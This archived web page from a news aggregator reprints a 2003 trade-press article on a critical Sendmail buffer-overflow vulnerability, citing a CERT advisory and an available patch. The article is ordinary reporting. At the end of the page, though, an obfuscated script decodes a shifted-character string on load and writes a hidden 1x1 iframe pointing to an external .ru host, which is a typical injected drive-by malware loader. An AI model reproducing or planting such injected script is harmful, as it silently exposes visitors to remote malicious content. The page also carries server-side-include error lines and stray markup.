[an error occurred while processing this directive]
     <p align=left><font face=arial><big><b>CurzTech News Network</b></big>
      <hr>
      <small><a href="http://curztech.com/news/">CurzTech&nbsp;News&nbsp;Network</a> |&nbsp;<a href="http://curztech.com/news/worldnews.shtml">CurzTech&nbsp;World&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/usnews.shtml">CurzTech&nbsp;U.S.&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/entertainment.shtml">CurzTech&nbsp;Entertainment&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/politics.shtml">CurzTech&nbsp;Political&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/conspiracy.shtml">CurzTech&nbsp;Conspiracy&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/offsitenews_prev.shtml">Yesterday's News</a> |&nbsp;<a href="http://curztech.com/news/offsite_archive.shtml">Offsite Archive</a></small>
      <hr>
     </p>

<!-- Begin Content -->











<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OSAC Item (Printer Friendly Version)</title>
</head>

<body>




<font CLASS="header"><strong>Sendmail Hit by Critical Security Bug</strong></font><BR>from VNU Business Publishing on Monday, March 31, 2003
<P> Vulnerability could allow attacker to gain control of server <P>
Sendmail, the web's most popular email message transfer agent, has released a patch for a 'critical' security vulnerability. The remotely exploitable vulnerability could allow an attacker to gain control of an unpatched Sendmail server. <P>
Security authority the Cert Coordination Centre warned that "parsing code in Sendmail does not adequately check the length of email addresses. An email message with a specially crafted address could trigger a stack overflow."  <P>
The vulnerability could be used to cause a denial of service attack and could allow a remote attacker to execute arbitrary code with the privileges of the Sendmail daemon - typically at root level. <P>
"Most organisations have a variety of mail transfer agents [MTAs] at various locations within their network, with at least one exposed to the internet," said Cert. <P>
"Since Sendmail is the most popular MTA, most medium-sized to large organisations are likely to have at least one vulnerable Sendmail server. <P>
"In addition, many Unix and Linux workstations provide a Sendmail implementation that is enabled and running by default." <P>
A patch is available on the Sendmail website, while more information on the vulnerability is available in the Cert advisory at <A HREF="http://www.cert.org/advisories/CA-2003-12.html"TARGET="_new">http://www.cert.org/advisories/CA-2003-12.html</A>. <P>
&copy; 1995-2003 VNU Business Publications Ltd. All rights reserved <P></A></B></I></U></H1></H2></H3></PRE></BIG></FONT></STRONG></BLINK></SMALL></OL></UL></QUOTE> 











<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>
</html>

[an error occurred while processing this directive]